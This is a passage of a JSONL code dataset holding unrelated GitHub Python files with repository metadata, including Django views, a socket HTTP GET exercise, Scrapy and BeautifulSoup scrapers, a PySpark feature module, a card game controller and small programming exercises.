['bronze', 'rare_bronze', 'totw_bronze', 'tots_bronze'],\n ' is-silver': ['silver', 'rare_silver', 'totw_silver', 'tots_silver'],\n ' is-gold': ['gold', 'rare_gold', 'totw_gold', 'tots_gold'],\n ' is-rare': ['rare_bronze', 'rare_silver', 'rare_gold'],\n ' is-totw': ['totw_bronze', 'totw_silver', 'totw_gold'],\n ' is-tots': ['tots_bronze', 'tots_silver', 'tots_gold'],\n ' is-toty': 'toty',\n ' is-motm': 'motm',\n ' is-easports': 'easports',\n ' is-purple': 'purple',\n ' is-green': 'green',\n ' is-pink': 'pink',\n ' is-legend': 'legend'\n }\n\n print(obj.get('color'))\n\n for css_class, color in color_classes.items():\n if obj.get('color') in color:\n card_class += css_class\n\n return card_class.lstrip()\n\n\nclass PlayerJSONList(View):\n def get(self, *args, **kwargs):\n players = serializers.serialize('json', Player.objects.all()[:28])\n\n return HttpResponse(json.dumps(players))\n\n def post(self, request, *args, **kwargs):\n text = request.POST.get('text')\n\n player_list = Player.objects.filter(\n Q(first_name__icontains=text) | Q(last_name__icontains=text)\n ).values(\n 'pk', 'common_name', 'color', 'overall_rating', 'image_medium',\n 'club__image_medium', 'nation__image_medium', 'slug'\n )[:20]\n\n players = []\n\n for player in player_list:\n new_player = {key: value for key, value in player.items()}\n new_player['css_class'] = Player.card_class(player)\n players.append(new_player)\n\n return HttpResponse(json.dumps(list(players), cls=DjangoJSONEncoder))\n","repo_name":"dan-gamble/fifa-x","sub_path":"fifa/apps/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8392091216","text":"#You are to retrieve the following document using the HTTP protocol in a way that you can examine the HTTP Response headers.\n#http://data.pr4e.org/intro-short.txt\nimport socket #importing socket library\n\nmysock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) #creates a socket connection\nmysock.connect(('data.pr4e.org',80)) #establish a connection with a domain (data.pr4e.org) and port (80 - port code for HTTP web server)\ncmd = 'GET http://data.pr4e.org/intro-short.txt HTTP/1.0\\r\\n\\r\\n'.encode() #creating a GET request(to be sent to the server) following the HTTP protocol and encoding it in bytes object\nmysock.send(cmd) #sending the request through mysock handle\n\nwhile True: # printing the retrived data\n data = mysock.recv(512)\n if len(data) < 1:\n break\n print(data.decode())\nmysock.close() # closing the connection","repo_name":"dhrumiltailor10/python-programs","sub_path":"URLLIB/Socket.py","file_name":"Socket.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4918273635","text":"# take a list for example\n# a = [1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89]\n# and write a program that prints out all the elements\n# which are less than 5.\n\na = [1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89]\nfor num in a:\n if num < 5:\n print(num)\n\n\n# Extras 1:\n# Instead of printing the elements one by one, \n# make a new list that has all the elements less than 5 \n# from this list in it and print out this new list.\nl = []\nfor num in a:\n if num < 5:\n l.append(num)\n\nprint(l)\n\n\n# Extras 2:\n# Ask the user for a number \n# and return a list that contains only elements from the original list \n# that are smaller than that number given by the user.\nx = []\nnumber = input(\"What is your number? \")\nfor num in a:\n if num < int(number):\n x.append(num)\n\nprint(x)","repo_name":"UpCode-Academy/Python-Bootcamp-October","sub_path":"problems/02 - list.py","file_name":"02 - list.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2957344248","text":"from scrapy import Spider, Request\nfrom glassdoor.items import GlassdoorItem\nimport re\n\n\n\nclass GlassdoorSpider(Spider):\n name = \"glassdoor_spider\"\n allowed_domains = ['www.glassdoor.com']\n start_urls = ['https://www.glassdoor.com']\n\n def parse(self,response):\n\n result_urls = ['https://www.glassdoor.com/Award/Best-Places-to-Work-{}-LST_KQ0,24.htm'.format(x) for x in range(2009,2020)]\n\n for url in result_urls:\n yield Request(url=url, callback= self.parse_result_page,dont_filter=True)\n\n\n def parse_result_page(self,response):\n\n company_urls = response.xpath('//div[@class=\"employerLogo ml-xl mr-std\"]/a/@href').extract()\n\n company_urls = ['https://www.glassdoor.com{}'.format(x) for x in company_urls]\n\n try:\n year = re.findall('\\d+', response.xpath('//h1[@class=\"listTitle center my-xl strong\"]/small/text()').extract_first())[0]\n except: \n year = ''\n\n\n try: \n start_date = re.findall('\\d+/\\d+/\\d+',response.xpath('//span[@class=\"minor\"]/text()').extract_first())[0]\n except:\n start_date = ''\n\n try:\n end_date = re.findall('\\d+/\\d+/\\d+',response.xpath('//span[@class=\"minor\"]/text()').extract_first())[1]\n except: \n end_date = ''\n\n for url in company_urls:\n yield Request(url=url, callback = self.parse_overview_page, dont_filter=True, meta = {'start_date': start_date, 'end_date':end_date, 'year':year})\n\n def parse_overview_page(self,response):\n start_date = response.meta['start_date']\n end_date = response.meta['end_date']\n year = response.meta['year']\n\n\n benefitsurl = ''.join(response.xpath('//a[@class=\"eiCell cell benefits \"]/@href').extract()+response.xpath('//a[@class=\"eiCell cell benefits active\"]/@href').extract())\n\n benefits_url = 'https://www.glassdoor.com{}'.format(benefitsurl)\n\n company = response.xpath('//*[@id=\"DivisionsDropdownComponent\"]/text()').extract_first()\n\n website = response.xpath('//div[@class=\"info flexbox row col-hh\"]/div[1]/span/a/text()').extract_first()\n\n location = response.xpath('//div[@class=\"info flexbox row col-hh\"]/div[2]/span/text()').extract_first()\n\n employee_count = response.xpath('//div[@class=\"info flexbox row col-hh\"]/div[3]/span/text()').extract_first()\n\n founded = response.xpath('//div[@class=\"info flexbox row col-hh\"]/div[4]/span/text()').extract_first()\n\n cotype = response.xpath('//div[@class=\"info flexbox row col-hh\"]/div[5]/span/text()').extract_first()\n\n ticker = ''.join(re.findall('\\(([^\\)]+)\\)', cotype))\n\n industry = response.xpath('//div[@class=\"info flexbox row col-hh\"]/div[6]/span/text()').extract_first()\n\n revenue = response.xpath('//div[@class=\"info flexbox row col-hh\"]/div[7]/span/text()').extract_first()\n\n yield Request(url=benefits_url, callback = self.parse_benefits_page, dont_filter=True, meta = {'start_date': start_date, 'end_date':end_date, 'year':year, 'company':company,'website':website,'location':location,'employee_count':employee_count,'founded':founded,'cotype':cotype, 'ticker':ticker, 'industry':industry, 'revenue':revenue})\n\n def parse_benefits_page(self,response):\n start_date = response.meta['start_date']\n end_date = response.meta['end_date']\n year = response.meta['year']\n company = response.meta['company']\n website = response.meta['website']\n location = response.meta['location']\n employee_count = response.meta['employee_count']\n founded = response.meta['founded']\n cotype = response.meta['cotype']\n ticker = response.meta['ticker']\n industry = response.meta['industry']\n revenue = response.meta['revenue']\n\n interviewurl = response.xpath('//a[@class=\"eiCell cell interviews \"]/@href').extract_first()\n\n interview_url = 'https://www.glassdoor.com{}'.format(interviewurl)\n\n benefits_rating = response.xpath('//div[@class=\"ratingNum rating\"]/text()').extract_first() \n\n benefits_n_reviews = response.xpath('//div[@class=\"minor\"]/span/text()').extract_first()\n\n yield Request(url=interview_url, callback = self.parse_interview_page, dont_filter=True, meta = {'start_date': start_date, 'end_date':end_date, 'year':year, 'company':company,'website':website,'location':location,'employee_count':employee_count,'founded':founded,'cotype':cotype, 'ticker':ticker,'industry':industry, 'revenue':revenue,'benefits_rating':benefits_rating, 'benefits_n_reviews': benefits_n_reviews})\n\n def parse_interview_page(self,response):\n start_date = response.meta['start_date']\n end_date = response.meta['end_date']\n year = response.meta['year']\n company = response.meta['company']\n website = response.meta['website']\n location = response.meta['location']\n employee_count = response.meta['employee_count']\n founded = response.meta['founded']\n cotype = response.meta['cotype']\n ticker = response.meta['ticker']\n industry = response.meta['industry']\n revenue = response.meta['revenue']\n benefits_rating = response.meta['benefits_rating']\n benefits_n_reviews = response.meta['benefits_n_reviews']\n\n reviewsurl = response.xpath('//a[@class=\"eiCell cell reviews \"]/@href').extract_first() \n\n reviews_url = 'https://www.glassdoor.com{}'.format(reviewsurl)\n\n interview_difficulty = response.xpath('//div[@class=\"difficultyLabel subtle\"]/text()').extract_first()\n\n interview_n_reviews = re.findall('\\d+', response.xpath('//div[@class=\"cell chartWrapper experience\"]/h3/span/text()').extract_first())\n\n positive_xp = response.xpath('//div[@class=\"cell chartWrapper experience\"]/div/div/div[2]/div/div[2]/div[2]/span/text()').extract_first()\n\n neutral_xp = response.xpath('//div[@class=\"cell chartWrapper experience\"]/div/div/div[2]/div/div[3]/div[2]/span/text()').extract_first()\n\n negative_xp = response.xpath('//div[@class=\"cell chartWrapper experience\"]/div/div/div[2]/div/div[4]/div[2]/span/text()').extract_first()\n\n yield Request(url=reviews_url, callback = self.parse_reviews_page, dont_filter=True, meta = {'start_date': start_date, 'end_date':end_date, 'year':year, 'company':company,'website':website,'location':location,'employee_count':employee_count,'founded':founded,'cotype':cotype, 'ticker':ticker,'industry':industry, 'revenue':revenue,'benefits_rating':benefits_rating, 'benefits_n_reviews': benefits_n_reviews, 'interview_difficulty':interview_difficulty, 'interview_n_reviews':interview_n_reviews, 'positive_xp':positive_xp, 'neutral_xp':neutral_xp, 'negative_xp':negative_xp})\n\n def parse_reviews_page(self,response):\n start_date = response.meta['start_date']\n end_date = response.meta['end_date']\n year = response.meta['year']\n company = response.meta['company']\n website = response.meta['website']\n location = response.meta['location']\n employee_count = response.meta['employee_count']\n founded = response.meta['founded']\n cotype = response.meta['cotype']\n ticker = response.meta['ticker']\n industry = response.meta['industry']\n revenue = response.meta['revenue']\n benefits_rating = response.meta['benefits_rating']\n benefits_n_reviews = response.meta['benefits_n_reviews']\n interview_difficulty = response.meta['interview_difficulty']\n interview_n_reviews = response.meta['interview_n_reviews']\n positive_xp = response.meta['positive_xp']\n neutral_xp = response.meta['neutral_xp']\n negative_xp = response.meta['negative_xp']\n \n\n culture_score = response.xpath('//div[@class=\"common__EIReviewsRatingsStyles__ratingNum mb-sm mb-md-0\"]/text()').extract_first()\n\n recommendation = response.xpath('//tspan[@class=\"donut__DonutStyle__donutchart_text_val\"]/text()').extract()[0]\n\n try:\n ceo_score = response.xpath('//tspan[@class=\"donut__DonutStyle__donutchart_text_val\"]/text()').extract()[1]\n except:\n ceo_score = ''\n\n number_reviews = response.xpath('//div[@class=\"common__EIReviewSortBarStyles__sortsHeader row justify-content-between mt-md-xl mt-sm\"]/h2/span/strong/text()').extract_first()\n\n reviews = response.xpath('//p[@class=\"common__EIReviewHighlightsStyles__highlightText my-0\"]/span//text()').extract()\n\n reviews = re.sub('\\(([^\\)]+)\\)',',,,', str(reviews)).split(',,,')\n\n reviewspro = (' '.join(re.findall('\\w+', reviews[0]))) + ' '+ (' '.join(re.findall('\\w+', reviews[1])))\n\n reviewscon = (' '.join(re.findall('\\w+', reviews[2]))) + ' '+ (' '.join(re.findall('\\w+', reviews[3])))\n\n review_item = GlassdoorItem()\n review_item['reviewspro'] = reviewspro\n review_item['reviewscon'] = reviewscon\n review_item['number_reviews'] = number_reviews\n review_item['recommendation'] = recommendation\n review_item['ceo_score'] = ceo_score\n review_item['culture_score'] = culture_score\n review_item['positive_xp'] = positive_xp\n review_item['neutral_xp'] = neutral_xp\n review_item['negative_xp'] = negative_xp\n review_item['interview_difficulty'] = interview_difficulty\n review_item['interview_n_reviews'] = interview_n_reviews\n review_item['benefits_n_reviews'] = benefits_n_reviews\n review_item['benefits_rating'] = benefits_rating\n review_item['year'] = year\n review_item['start_date'] = start_date\n review_item['end_date'] = end_date\n review_item['company'] = company\n review_item['website'] = website\n review_item['location'] = location\n review_item['employee_count'] = employee_count\n review_item['founded'] = founded\n review_item['cotype'] = cotype\n review_item['ticker'] = ticker\n review_item['industry'] = industry\n review_item['revenue'] = revenue\n\n yield review_item\n\n\n\n\n","repo_name":"chosus/glassdoor","sub_path":"scrapy_csv_files/glassdoor_best_places_to_work/glassdoor/spiders/glassdoor_spider.py","file_name":"glassdoor_spider.py","file_ext":"py","file_size_in_byte":10068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37285685008","text":"#\n# @lc app=leetcode id=524 lang=python3\n#\n# [524] Longest Word in Dictionary through Deleting\n#\n# https://leetcode.com/problems/longest-word-in-dictionary-through-deleting/description/\n#\n# algorithms\n# Medium (46.10%)\n# Likes: 348\n# Dislikes: 183\n# Total Accepted: 46.3K\n# Total Submissions: 100.2K\n# Testcase Example: '\"abpcplea\"\\n[\"ale\",\"apple\",\"monkey\",\"plea\"]'\n#\n# \n# Given a string and a string dictionary, find the longest string in the\n# dictionary that can be formed by deleting some characters of the given\n# string. If there are more than one possible results, return the longest word\n# with the smallest lexicographical order. If there is no possible result,\n# return the empty string.\n# \n# Example 1:\n# \n# Input:\n# s = \"abpcplea\", d = [\"ale\",\"apple\",\"monkey\",\"plea\"]\n# \n# Output: \n# \"apple\"\n# \n# \n# \n# \n# Example 2:\n# \n# Input:\n# s = \"abpcplea\", d = [\"a\",\"b\",\"c\"]\n# \n# Output: \n# \"a\"\n# \n# \n# \n# Note:\n# \n# All the strings in the input will only contain lower-case letters.\n# The size of the dictionary won't exceed 1,000.\n# The length of all the strings in the input won't exceed 1,000.\n# \n# \n#\nclass Solution:\n def issubsequence(self, x, y):\n j = 0\n for i in range(len(y)):\n if x[j] == y[i]:\n j += 1\n if j == len(x):\n break\n return j == len(x)\n\n\n def findLongestWord(self, s: str, d: List[str]) -> str:\n # max_str = \"\"\n # for str in d:\n # if self.issubsequence(str, s):\n # if len(str) > len(max_str) or (len(str) == len(max_str) and str < max_str):\n # max_str = str\n\n # return max_str\n\n for word in sorted(d, key=lambda w: (-len(w), w)):\n it = iter(s)\n if all(c in it for c in word): return word\n return \"\"\n\n \n\n","repo_name":"chenxu0602/LeetCode","sub_path":"524.longest-word-in-dictionary-through-deleting.py","file_name":"524.longest-word-in-dictionary-through-deleting.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"7657462888","text":"from element import *\n\nclass Game():\n def __init__(self):\n self.operation = [] #所有被点击的对象\n self.cards_used = [] #每回合已经使用过的卡牌\n self.permitted_operation = [] #允许点击的对象\n self.origin_discard = 0 #是否需要弃牌的判断标志\n self.discard = 0 #动态变化的弃牌判断标志\n self.step = 1 #操作步数\n self.now = 0 #当前回合玩家\n self.leave = False #游戏是否结束的标志\n self.camp = [\"The former\", \"The latter\"]\n self.OK = \"OK\"\n self.CANCEL = \"cancel\"\n self.END = \"end\"\n \n def setPermittedOperation(self): #设置允许点击的对象\n global players\n self.permitted_operation.clear()\n for card in players[self.now].cards:\n if card.usable(self.cards_used):\n self.permitted_operation.append(card)\n for chess in players[self.now].chesses:\n if chess.can_use_skill != 0 and chess.imprisoned == 0:\n self.permitted_operation.append(chess)\n for button in players[self.now].battle_buttons:\n if button.available == True:\n self.permitted_operation.append(button)\n self.permitted_operation.append(\"end\")\n\n def initialize(self, board): #游戏初始化\n global players\n self.board = board\n boardInitialize(board)\n players[self.now].dropCards(2)\n chesses_list0 = (players[0].chesses[0], players[1].chesses[0])\n chesses_list1 = (players[0].chesses[1], players[1].chesses[1])\n chesses_list2 = (players[0].chesses[2], players[1].chesses[2])\n chesses_list3 = (players[0].chesses[3], players[1].chesses[3])\n chesses_list4 = (players[0].chesses[4], players[1].chesses[4])\n chesses_list5 = (players[0].chesses[5], players[1].chesses[5])\n chesses_list6 = (players[0].chesses[6], players[1].chesses[6])\n chesses_list7 = (players[0].chesses[7], players[1].chesses[7])\n chesses_list = (chesses_list0, chesses_list1, chesses_list2, chesses_list3, chesses_list4, chesses_list5, chesses_list6, chesses_list7)\n self.board.hud.initialize_chesses(chesses_list)\n self.setPermittedOperation()\n for card in players[self.now].cards:\n self.board.hud.display_card(card)\n for button in players[self.now].battle_buttons:\n self.board.bud.display_battle_button(button)\n self.board.hud.set_enemy_cards_num(len(players[1-self.now].cards))\n self.board.hud.set_clickable(self.permitted_operation)\n self.board.hud.refresh_chesses_states()\n\n def roundEnd(self): #每个回合结束后的动作\n global players, battles\n players[0].chessChange()\n players[1].chessChange()\n for chess in players[self.now].chesses:\n if chess.position == list(self.board.map.origin[1-self.now]):\n self.leave = True\n self.board.hud.print(self.camp[self.now] + \" win!\")\n self.board.hud.set_clickable([self.END])\n return\n for card in players[self.now].cards:\n self.board.hud.remove_card(card)\n for button in players[self.now].battle_buttons: \n self.board.hud.remove_battle_button(button)\n for battle in battles:\n battle.settle()\n self.cards_used.clear()\n self.operation.clear()\n setNow(1-self.now)\n self.now = 1-self.now\n players[self.now].dropCards(2)\n self.setPermittedOperation()\n self.board.hud.switch_chesses()\n self.board.hud.refresh_chesses_states()\n for card in players[self.now].cards:\n self.board.hud.display_card(card)\n for button in players[self.now].battle_buttons:\n self.board.hud.display_battle_button(button)\n self.board.hud.set_enemy_cards_num(len(players[1-self.now].cards))\n self.board.hud.set_clickable(self.permitted_operation)\n\n def click(self, obj): #得到点击会的对象的操作\n global players, card_library\n if obj not in self.permitted_operation:\n self.board.hud.set_clickable(self.permitted_operation)\n return\n if obj == self.END:\n if self.leave == True:\n self.board.leave()\n return\n self.discard = len(players[self.now].cards) - 5 #最多只能存储5张牌\n self.discard = 0 if self.discard < 0 else self.discard\n self.origin_discard = self.discard\n if self.discard == 0:\n self.roundEnd()\n else:\n self.permitted_operation = players[self.now].cards[:]\n self.board.hud.set_clickable(self.permitted_operation)\n elif obj == self.CANCEL:\n self.step = 1\n self.operation.clear()\n if self.origin_discard == 0:\n self.setPermittedOperation()\n else:\n self.permitted_operation = players[self.now].cards[:]\n self.discard = self.origin_discard\n self.board.hud.set_clickable(self.permitted_operation)\n elif obj == self.OK:\n if self.operation[0].__class__.__bases__[0].__name__ == \"Card\":\n if self.origin_discard == 0:\n players[self.now].cards.remove(self.operation[0])\n card_library.discard.append(self.operation[0]) \n self.board.hud.remove_card(self.operation[0])\n use_card_str = self.camp[self.now]+\" use \" + self.operation[0].__class__.__name__ +'('+str(self.operation[0].point)+')'\n for ope in self.operation[1:]:\n use_card_str += (\", target is \" + ope.__class__.__name__)\n self.board.hud.print(use_card_str)\n for chess in players[self.now].chesses:\n chess.timeUseCard(self.operation[0], self.cards_used)\n self.cards_used.append(self.operation[0])\n self.operation[0].skill(self.operation[1:]) \n else:\n discard_card_str = self.camp[self.now] + \" discard \"\n for card in self.operation:\n players[self.now].cards.remove(card)\n card_library.discard.append(card)\n self.board.hud.remove_card(card)\n self.discard = 0\n self.origin_discard = 0\n discard_card_str += (card.__class__.__name__ + ' ')\n self.board.hud.print(discard_card_str)\n self.roundEnd()\n elif self.operation[0].__class__.__bases__[0].__name__ == \"Chess\":\n if self.operation[0].can_use_skill > 0:\n self.operation[0].can_use_skill -= 1\n use_chess_str = self.camp[self.now]+\" use \" +self.operation[0].__class__.__name__ + \"'s skill\"\n for ope in self.operation[1:]:\n use_chess_str += (\", target is \" + ope.__class__.__name__)\n self.board.hud.print(use_chess_str)\n self.operation[0].skill(self.operation[1:], self.cards_used)\n elif self.operation[0].__class__.__name__ == \"Button\":\n players[self.now].cards.remove(self.operation[1])\n self.board.hud.remove_card(self.operation[1])\n self.board.hud.print(self.camp[self.now] + \" put a battle card\")\n self.operation[0].skill(self.operation[1:])\n self.step = 1\n self.operation.clear()\n self.setPermittedOperation()\n self.board.hud.set_clickable(self.permitted_operation)\n self.board.hud.refresh_chesses_states()\n self.board.hud.clear_selection()\n else:\n self.operation.append(obj)\n if self.operation[0].__class__.__bases__[0].__name__ == \"Card\":\n if self.discard == 0:\n self.permitted_operation = self.operation[0].needOperation(self.step)\n else:\n self.discard -= 1\n if self.discard == 0:\n self.permitted_operation = [\"cancel\", \"OK\"]\n else:\n self.permitted_operation.clear()\n for card in players[self.now].cards:\n if card not in self.operation:\n self.permitted_operation.append(card)\n self.permitted_operation.append(\"cancel\")\n if self.discard == 0:\n self.permitted_operation.append(\"cancel\")\n elif self.operation[0].__class__.__bases__[0].__name__ == \"Chess\":\n self.permitted_operation = self.operation[0].needOperation(self.operation, self.step)\n elif self.operation[0].__class__.__name__ == \"Button\":\n self.permitted_operation = self.operation[0].needOperation(self.step)\n self.step += 1\n self.board.hud.set_clickable(self.permitted_operation)","repo_name":"GeoffreYu/Versus","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":9201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6854931066","text":"import os\nimport csv\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef scrap_quotes(url=\"\"):\n domain = \"https://quotes.toscrape.com\"\n req = requests.get(f\"{domain}{url}\")\n soup = BeautifulSoup(req.text)\n\n quotes = []\n quotes_tags = soup.select(\"div.quote\")\n for quote_tag in quotes_tags:\n quote = {}\n quote['text'] = quote_tag.select(\"span.text\")[0].getText()\n quote['author'] = quote_tag.select(\"small.author\")[0].getText()\n quote['tags'] = []\n for tag in quote_tag.select(\"div.tags a.tag\"):\n quote['tags'].append(tag.getText())\n quotes.append(quote)\n\n next_url = None\n link_tag = soup.select(\"li.next a\")\n if len(link_tag) > 0:\n next_url = link_tag[0]['href']\n\n print(f\"Página {domain}{url}, {len(quotes)} citas scrapeadas.\")\n\n return quotes, next_url\n\n\ndef scrap_site(limit=2):\n all_quotes = []\n next_url = \"\"\n while 1:\n quotes, next_url = scrap_quotes(next_url)\n all_quotes += quotes\n limit -= 1\n if limit == 0 or next_url == None:\n return all_quotes\n\n\nclass Citas:\n quotes = []\n\n if os.path.exists(\"quotes.csv\"):\n with open(\"quotes.csv\", \"r\") as file:\n data = csv.DictReader(file)\n for quote in data:\n quote['tags'] = eval(quote['tags'])\n quotes.append(quote)\n\n @staticmethod\n def scrapear():\n Citas.quotes = scrap_site(limit=99) # <--- LIMITE MUY GRANDE\n with open(\"quotes.csv\", \"w\") as file:\n writer = csv.DictWriter(\n file, fieldnames=[\"text\", \"author\", \"tags\"])\n writer.writeheader()\n for quote in Citas.quotes:\n writer.writerow(quote)\n\n @staticmethod\n def listar(limite=10):\n for quote in Citas.quotes[:limite]:\n print(quote[\"text\"])\n print(quote[\"author\"])\n for tag in quote[\"tags\"]:\n print(tag, end=\" \")\n print(\"\\n\")\n\n @staticmethod\n def etiqueta(nombre=\"\"):\n for quote in Citas.quotes:\n if nombre in quote[\"tags\"]:\n print(quote[\"text\"])\n print(quote[\"author\"])\n for tag in quote[\"tags\"]:\n print(tag, end=\" \")\n print(\"\\n\")\n\n @staticmethod\n def autor(nombre=\"\"):\n for quote in Citas.quotes:\n if nombre == quote[\"author\"]:\n print(quote[\"text\"])\n print(quote[\"author\"])\n for tag in quote[\"tags\"]:\n print(tag, end=\" \")\n print(\"\\n\")\n","repo_name":"JesusMirandaEspino/API-phyton-curso","sub_path":"finalscraping.py","file_name":"finalscraping.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73950171685","text":"from typing import Dict, List, Iterable\nfrom functools import reduce\nfrom pyspark.sql import SparkSession, DataFrame, functions as f\nfrom pyspark.sql.window import Window\nfrom odap.common.dataframes import create_dataframe\n\nfrom odap.common.logger import logger\nfrom odap.common.config import TIMESTAMP_COLUMN\n\nfrom odap.feature_factory import const\nfrom odap.feature_factory.config import (\n Config,\n)\nfrom odap.feature_factory.dq_checks import execute_soda_checks_from_feature_notebooks\nfrom odap.feature_factory.feature_notebook import FeatureNotebookList\nfrom odap.feature_factory.metadata_schema import get_metadata_schema\n\n\ndef join_dataframes(dataframes: List[DataFrame], join_columns: List[str]) -> DataFrame:\n dataframes = [df.na.drop(how=\"any\", subset=join_columns) for df in dataframes]\n window = Window.partitionBy(*join_columns).rowsBetween(Window.unboundedPreceding, Window.unboundedFollowing)\n union_df = reduce(lambda df1, df2: df1.unionByName(df2, allowMissingColumns=True), dataframes)\n columns = [col for col in union_df.columns if col not in join_columns]\n\n logger.info(f\"Joining {len(dataframes)} dataframes...\")\n joined_df = (\n union_df.select(\n *join_columns,\n *[f.first(column, ignorenulls=True).over(window).alias(column) for column in columns],\n )\n .groupBy(join_columns)\n .agg(*[f.first(column).alias(column) for column in columns])\n )\n logger.info(\"Join successful.\")\n\n return joined_df\n\n\ndef get_all_feature_tables(config: Config) -> Iterable[str]:\n spark = SparkSession.getActiveSession()\n metadata_table = config.get_metadata_table()\n return {row.table for row in spark.table(metadata_table).select(const.TABLE).collect()}\n\n\ndef create_metadata_df(feature_notebooks: FeatureNotebookList) -> DataFrame:\n features_metadata = []\n for notebook in feature_notebooks:\n features_metadata.extend(notebook.metadata)\n\n return create_dataframe(features_metadata, get_metadata_schema())\n\n\ndef fill_nulls_in_notebook(notebook: List[Dict]) -> Dict:\n fill_dict = {}\n\n for feature in notebook:\n if feature[const.FILLNA_VALUE_TYPE] == \"NoneType\":\n continue\n if feature[const.DTYPE].startswith(\"array\"):\n continue\n\n fill_dict[feature[const.FEATURE]] = feature[const.FILLNA_VALUE]\n return fill_dict\n\n\ndef fill_array_nulls(df: DataFrame, notebook: List[Dict]) -> DataFrame:\n for feature in notebook:\n if feature[const.DTYPE].startswith(\"array\") and feature[const.FILLNA_VALUE] is not None:\n df = df.withColumn(\n feature[const.FEATURE],\n f.when(\n f.col(feature[const.FEATURE]).isNull(), f.array(*map(f.lit, feature[const.FILLNA_VALUE]))\n ).otherwise(f.col(feature[const.FEATURE])),\n )\n return df\n\n\ndef fill_nulls(df: DataFrame, feature_notebooks: FeatureNotebookList) -> DataFrame:\n metadata = [notebook.metadata for notebook in feature_notebooks]\n fill_dict = {}\n\n for notebook in metadata:\n notebook_dict = fill_nulls_in_notebook(notebook)\n fill_dict.update(notebook_dict)\n\n for notebook in metadata:\n df = fill_array_nulls(df, notebook)\n\n return df.fillna(fill_dict)\n\n\ndef create_features_df(feature_notebooks: FeatureNotebookList, entity_primary_key: str) -> DataFrame:\n joined_df = join_dataframes(\n dataframes=[notebook.df for notebook in feature_notebooks], join_columns=[entity_primary_key, TIMESTAMP_COLUMN]\n )\n\n filled_df = fill_nulls(joined_df, feature_notebooks)\n\n execute_soda_checks_from_feature_notebooks(df=filled_df, feature_notebooks=feature_notebooks)\n\n return filled_df\n","repo_name":"DataSentics/odap","sub_path":"odap-package/src/odap/feature_factory/dataframes/dataframe_creator.py","file_name":"dataframe_creator.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"1279104361","text":"from lib.diary import *\nfrom lib.diary_entry import *\n\n\"\"\"\nGiven several diary entries\ncan return a list of entries\n\"\"\"\ndef test_returns_list_after_several_diary_entries():\n entry_1 = DiaryEntry('Title 1', 'This is the first entry of the diary.')\n entry_2 = DiaryEntry('Title 2', 'This is the second entry in the diary.')\n diary = Diary()\n diary.add(entry_1)\n diary.add(entry_2)\n assert diary.all() == ['Title 1', 'Title 2']\n\n\n\"\"\"\nWith several entries in list\nCan return total word count of entries\n\"\"\"\ndef test_returns_total_word_count_of_entries():\n entry_1 = DiaryEntry('Title 1', 'This is the first entry of the diary.')\n entry_2 = DiaryEntry('Title 2', 'This is the second entry in the diary.')\n diary = Diary()\n diary.add(entry_1)\n diary.add(entry_2)\n assert diary.count_words() == 20\n\n\n\"\"\"\nWith several entries in list\nCan give an estimate of reading time in minutes for entire diary\n\"\"\"\ndef test_returns_estimate_of_reading_time():\n entry_1 = DiaryEntry('Title 1', 'This is the first entry of the diary.')\n entry_2 = DiaryEntry('Title 2', 'This is the second entry in the diary.')\n diary = Diary()\n diary.add(entry_1)\n diary.add(entry_2)\n assert diary.reading_time(10) == 2\n\n\n\"\"\"\nGiven a reading speed and an amount of time\nCan return appropriate entries to be read in that time\n\"\"\"\ndef test_selects_appropriate_entries_for_reading_speed_and_time():\n entry_1 = DiaryEntry('Title 1', 'This is the first entry of the diary.')\n entry_2 = DiaryEntry('Title 2', 'This is the second entry in the diary. Some extra words.')\n entry_3 = DiaryEntry('Title 3', 'This is the third diary entry. It is longer and cannot be read as fast as the first two.')\n diary = Diary()\n diary.add(entry_1)\n diary.add(entry_2)\n diary.add(entry_3)\n assert diary.find_best_entry_for_reading_time(15, 1) == {'Title 2' : 'This is the second entry in the diary. Some extra words.'}","repo_name":"MartyPru/golden_square_skill_challenges","sub_path":"tests/test_diary_and_diary_entry_integration.py","file_name":"test_diary_and_diary_entry_integration.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73656774566","text":"def find(str):\n words = str.split()\n ch = 0\n digit = 0\n symb = 0\n for char in str:\n if char.islower() or char.isupper():\n ch+=1\n elif char.isnumeric():\n digit+=1\n else:\n symb+=1\n print(\"char: \",ch,\"\\ndigit: \",digit,\"\\nsymbols: \",symb)\nstr = input(\"Enter your string\\t\")\nfind(str)\n","repo_name":"alwinmreji/ROS-and-ML","sub_path":"Assingment_#2/#6_count_all_seperatly.py","file_name":"#6_count_all_seperatly.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"28384988885","text":"# 숨바꼭질 3\nfrom collections import deque\nn,k = map(int,input().split())\nMAX = 100001\nvisited = [False] * MAX\n\nqueue = deque([(0,n)])\n\nwhile queue:\n count, cur_pos = queue.popleft()\n if cur_pos == k:\n result = count\n break\n visited[cur_pos] = True\n \n cases = [(count,cur_pos*2),(count+1,cur_pos-1),(count+1,cur_pos+1)]\n \n for i in range(len(cases)):\n if cases[i][1] >=0 and cases[i][1]<=MAX-1 and not 